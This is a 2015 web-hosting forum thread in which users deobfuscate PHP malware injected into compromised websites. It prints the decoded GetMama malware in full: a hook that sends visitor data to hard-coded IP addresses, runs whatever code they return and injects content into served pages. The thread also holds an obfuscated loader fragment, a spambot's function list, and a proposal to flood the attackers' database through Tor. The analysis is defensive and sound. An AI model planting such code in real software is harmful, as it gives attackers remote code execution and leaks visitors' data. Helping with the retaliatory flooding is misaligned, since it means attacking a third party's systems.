php code injection: $xetqlznzyr =
Iris Member
edited May 2015 in Help

<?php $xetqlznzyr = '5-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825
Recently some websites got PHP code injection. What is the above code? It's not like base64.

It's quite a long one: http://pastebin.com/tdWHaCGX

Thanks to EdgeWeb for mentioning pastebin.

Comments

  • Obviously that's not all it, inside the rest of the code there's the routine that decrypts and executes it.

    You can decrypt it manually by reversing the steps it does, if you care to.

    Thanked by 1jar
  • EdgeWeb Member

    You'll have to upload a larger sample for anyone to be able to decipher anything from it. I also recommend that you upload it and link it via pastebin.

    Thanked by 1Iris
  • Upload the whole code man.

  • Iris Member

    It's quite a long one: http://pastebin.com/tdWHaCGX

  • ricardo Member

    Often it's just a gateway to accept requests/commands from a remote computer, as it gives them flexibility on how to use your resources. There's no great incentive to encrypt that other than curiosity.

    Thanked by 1deadbeef
  • It's not long, seen similar. Give me a few min to deobfuscate for you.

  • Too lazy to finish the rest but quite simply:

    if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { $GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_replace("/(.*)/e","eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!>#]y3g]61]y3f]63]y3:]68]y76#<\xe\xb\\

    Thanked by 1Iris
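As an added example (not the poster's script and not from any of the pastebins in this thread), the following Python reverses the single layer that the snippet above shows: it locates the `chr(ord($n)-1)` helper and the `array_map`/`str_split` call that feeds it, resolves PHP's double-quoted `\xNN` escapes, and shifts every byte back down. The PHP source it runs on is constructed here to mirror that snippet's structure; its payload is a harmless placeholder, not the thread's real one.

```python
import re
from typing import Optional

# PHP double-quoted escapes the loader relies on: \xN / \xNN plus common ones.
_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([\\"nrt$])')
_SIMPLE = {'\\': b'\\', '"': b'"', 'n': b'\n', 'r': b'\r', 't': b'\t', '$': b'$'}
# function NAME($v){return chr(ord($v)-DELTA);}  -- the per-byte decoder
_LOADER_RE = re.compile(
    r'function\s+(\w+)\s*\(\s*\$(\w+)\s*\)\s*\{\s*return\s+chr\s*\(\s*ord\s*'
    r'\(\s*\$\2\s*\)\s*-\s*(\d+)\s*\)\s*;\s*\}')
# array_map("NAME",str_split("PAYLOAD")); quotes are \"-escaped when the call
# sits inside the preg_replace /e replacement string, so accept both forms.
_PAYLOAD_RE = re.compile(
    r'array_map\s*\(\s*\\?"(\w+)\\?"\s*,\s*str_split\s*\(\s*\\?"(.*?)\\?"\s*\)\s*\)',
    re.DOTALL)

def php_unescape(literal: str) -> bytes:
    """Resolve escapes the way PHP does for a double-quoted string literal."""
    out, pos = bytearray(), 0
    for m in _ESCAPE_RE.finditer(literal):
        out += literal[pos:m.start()].encode('latin-1')
        out += bytes([int(m.group(1), 16)]) if m.group(1) else _SIMPLE[m.group(2)]
        pos = m.end()
    out += literal[pos:].encode('latin-1')
    return bytes(out)

def shift_down(data: bytes, delta: int) -> bytes:
    """Undo chr(ord($n)-delta) per byte; PHP's chr() wraps modulo 256."""
    return bytes((b - delta) % 256 for b in data)

def recover_stage(php_source: str) -> Optional[bytes]:
    """Return the decoded payload of the first matching loader, or None."""
    decoders = {m.group(1): int(m.group(3)) for m in _LOADER_RE.finditer(php_source)}
    for m in _PAYLOAD_RE.finditer(php_source):
        delta = decoders.get(m.group(1))
        if delta is not None:  # only decode str_split feeds whose helper we found
            return shift_down(php_unescape(m.group(2)), delta)
    return None

# Constructed sample in the shape of the snippet above; the payload is a
# harmless placeholder, not the thread's real one (it decodes to a print call).
SAMPLE = (
    r'<?php if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) { '
    r'$GLOBALS["anuna"]=1; function fjfgg($n){return chr(ord($n)-1);} '
    r'@error_reporting(0); preg_replace("/(.*)/e","eval(implode(array_map('
    r'\"fjfgg\",str_split(\"\x25b!>!#pl#<\xe\xbqsjou!\x25b<\"))))",""); }'
)

if __name__ == '__main__':
    print(recover_stage(SAMPLE))  # b'$a = "ok";\r\nprint $a;'
```

The recovered bytes are the next stage of the loader; they go into an editor, not into `eval`, so the decoded stage can be read and any further layers peeled the same way.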
  • And last message in this thread, the script I used to recover the original code: http://pastebin.com/Z30nMjWE

  • lol @ all the "decryptions" :D

  • ricardo Member

    if($owned) echo "All your base!";

  • Devonius Member
    edited May 2015

    Just curious, how did you decrypt it?

  • Microlinux Member
    edited May 2015

    I added line endings, searched/replaced and cleaned up the formatting.

  • This is what I've got, decoded and formatted :D
    http://pastebin.com/5dJSSqnJ

  • Falzo Member

    This part seems especially of interest:

       $father2[] = "77.81.241.253";
       $father2[] = "46.249.58.135";
       $father2[] = "176.9.241.150";
       $father2[] = "46.37.169.56";
       $father2[] = "94.242.255.35";
       $father2[] = "178.162.129.223";
       $father2[] = "31.184.234.96";
       $father2[] = "77.95.18.189";
       $father2[] = "93.170.137.22";
       $father2[] = "188.40.95.244";
       $father2[] = "199.115.231.58";
       $father2[] = "82.192.87.178";
       $father2[] = "216.246.99.215";
       $father2[] = "95.211.18.79";
    

    Probably one wants to blacklist all of those ;-)

  • edited May 2015

    GetMama

    https://blog.sucuri.net/2012/04/getmama-conditional-malware-affecting-thousands-of-sites.html

    For every request to the compromised sites, there will also be a random call to one of those. The called URL would look something like http://31.184.234.96/jedi.php?version=0991&mother=

    Thanked by 1daxterfellowes
  • Traffic Member
    edited May 2015

    Decoded it too late, @jemekite posted it before I saw it, but here's the code anyway:

    if (!function_exists("GetMama")) {
        function ahfudflfzdhfhs($pa)
        {
            $mama = GetMama();
            $file = urlencode(__FILE__);
            if (isset($_SERVER["HTTP_HOST"])) {
                $host = $_SERVER["HTTP_HOST"];
            }
            else {
                $host = "";
            }
    
            if (isset($_SERVER["REMOTE_ADDR"])) {
                $ip = $_SERVER["REMOTE_ADDR"];
            }
            else {
                $ip = "";
            }
    
            if (isset($_SERVER["HTTP_REFERER"])) {
                $ref = urlencode($_SERVER["HTTP_REFERER"]);
            }
            else {
                $ref = "";
            }
    
            if (isset($_SERVER["HTTP_USER_AGENT"])) {
                $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
            }
            else {
                $ua = "";
            }
    
            if (isset($_SERVER["QUERY_STRING"])) {
                $qs = urlencode($_SERVER["QUERY_STRING"]);
            }
            else {
                $qs = "";
            }
    
            $url_0 = "http://" . $pa;
            $url_1 = "/jedi.php?version=0994&mother=" . $mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" . $ua . "&qs=" . $qs;
            $try = true;
            if (function_exists("curl_init")) {
                $ch = curl_init($url_0 . $url_1);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                $ult = trim(curl_exec($ch));
                $try = false;
            }
    
            if ((ini_get("allow_url_fopen")) && $try) {
                $ult = trim(@file_get_contents($url_0 . $url_1));
                $try = false;
            }
    
            if ($try) {
                $fp = fsockopen($pa, 80, $errno, $errstr, 30);
                if ($fp) {
                    $out = "GET $url_1 HTTP/1.0\r\n";
                    $out.= "Host: $pa\r\n";
                    $out.= "Connection: Close\r\n\r\n";
                    fwrite($fp, $out);
                    $ret = "";
                    while (!feof($fp)) {
                        $ret.= fgets($fp, 128);
                    }
    
                    fclose($fp);
                    $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
                }
            }
    
            if (strpos($ult, "eval") !== false) {
                $z = stripslashes(str_replace("eval", "", $ult));
                eval($z);
                exit();
            }
    
            if (strpos($ult, "ebna") !== false) {
                $_SERVER["good"] = str_replace("ebna", "", $ult);
                return true;
            }
            else {
                return false;
            }
        }
    
        function gogo()
        {
            $father2[] = "77.81.241.253";
            $father2[] = "46.249.58.135";
            $father2[] = "176.9.241.150";
            $father2[] = "46.37.169.56";
            $father2[] = "94.242.255.35";
            $father2[] = "178.162.129.223";
            $father2[] = "31.184.234.96";
            $father2[] = "77.95.18.189";
            $father2[] = "93.170.137.22";
            $father2[] = "188.40.95.244";
            $father2[] = "199.115.231.58";
            $father2[] = "82.192.87.178";
            $father2[] = "216.246.99.215";
            $father2[] = "95.211.18.79";
            shuffle($father2);
            foreach($father2 as $ur) {
                if (ahfudflfzdhfhs($ur)) {
                    return true;
                }
            }
        }
    
        function mod_con($buf)
        {
            str_ireplace("", "", $buf, $cnt_h);
            if ($cnt_h == 1) {
                gogo();
                $buf = str_ireplace("", "" . stripslashes($_SERVER["good"]) , $buf);
                return $buf;
            }
    
            str_ireplace("", "", $buf, $cnt_h);
            if ($cnt_h == 1) {
                gogo();
                $buf = str_ireplace("", stripslashes($_SERVER["good"]) . "", $buf);
                return $buf;
            }
    
            return $buf;
        }
    
        function opanki($buf)
        {
            $gz_e = false;
            $h_l = headers_list();
            if (in_array("Content-Encoding: gzip", $h_l)) {
                $gz_e = true;
            }
    
            if ($gz_e) {
                $tmpfname = tempnam("/tmp", "FOO");
                file_put_contents($tmpfname, $buf);
                $zd = gzopen($tmpfname, "r");
                $contents = gzread($zd, 10000000);
                $contents = mod_con($contents);
                gzclose($zd);
                unlink($tmpfname);
                $contents = gzencode($contents);
            }
            else {
                $contents = mod_con($buf);
            }
    
            $len = strlen($contents);
            header("Content-Length: " . $len);
            return ($contents);
        }
    
        function GetMama()
        {
            $mother = "halsun.net";
            return $mother;
        }
    
        ob_start("opanki");
    }
    

    Only 2 of the father servers look online though.

  • What about declaring 'function GetMama() { return; }' before/above their code?

  • @Falzo said:
    This part seems especially of interest:

    Probably one wants to blacklist all of those ;-)

    I got a better idea, write a python script to mass-inject garbage data since it's inserting it into a database. Might as well fill them with nonsense.

    Thanked by 1netomx
  • And that's why I need to stop taking coffee breaks, haven't tested the code, because I'm about to finish my break but...

    pastebin.com/n3zPpRgn

  • Traffic Member

    @KwiceroLTD Do you really think you can pollute their database with that? I can delete all your "garbage" with a single SELECT.

    Don't leave your day job ;)

  • KwiceroLTD Member
    edited May 2015

    @Traffic said:
    KwiceroLTD Do you really think you can pollute their database with that? I can delete all your "garbage" with a single SELECT.

    Don't leave your day job ;)

    Yep you could, but if I had more time I'd add randomization of data so it's unique each request, etc. Top it all off, I'd add socks proxy support, and route it via tor to make it more of a pain in the ass.

    Thanked by 1Traffic
  • Can anyone have a go at decrypting this?

    Popped up on a client's machine twice now:

    https://gist.githubusercontent.com/anonymous/d5d445681671f61fa9ee/raw

  • edited May 2015

    @GStanley said:
    Can anyone have a go at decrypting this?

    Popped up on a client's machine twice now:

    https://gist.githubusercontent.com/anonymous/d5d445681671f61fa9ee/raw

    Haven't done the whole thing, but it's sending out mail...

    [qjyxw29] => error_reporting [irxaj0] => ini_set [cbimi76] => define [fdxkd35] => itwro48 [zkmxz95] => ikhls17 [qlafq33] => md5 [besfv99] => count [akdzl43] => time [nmgeu13] => constant [ylhli22] => xbzaw60 [tubyj82] => jcrxt31 [wlean57] => gtzjf94 [nfnov60] => onsxx86 [kowuc61] => nydwd49 [oenkz14] => function_exists [dptpo51] => mail <------------ [wbusj95] => hfrbo91 [cqced42] => rmssi53 [hcmkz82] => usleep [wqgpi24] => vgefz59 [lecyc16] => wowhk28 [vbzwj52] => trim [royge30] => preg_replace [genac32] => gethostbyname [aibit15] => preg_match

    ....

    [ztope57] => base64_encode [mlygh38] => socket_create [tpzik24] => socket_last_error [bxcji64] => socket_strerror [ynqyo69] => socket_set_option [fofco25] => socket_set_nonblock [hpaqw69] => socket_connect [lsftb14] => fsockopen

    Thanked by 1GStanley
  • Thanks! It's been spamming out quite a bit, and wanted to figure out something to throw in disable_functions, or get a look at the code.

    Been clearing out the directory a while now of injected PHP that got it there.

  • jazz1611 Member
    edited May 2015

    New PHP spam email bot code; I found many of these files in WordPress sources - http://pastebin.com/Kkr633Jq

  • @jazz1611 said:
    New PHP spam email bot code; I found many of these files in WordPress sources - http://pastebin.com/Kkr633Jq

    This is as far as I got: http://pastebin.com/1CjSMvbz. You should probably secure your server.

  • For WordPress, Wordfence Security is what I like for e.g. checking the integrity of files.

  • New code "Php.Malware.Mailbot-1" http://pastebin.com/mSrUTe8K
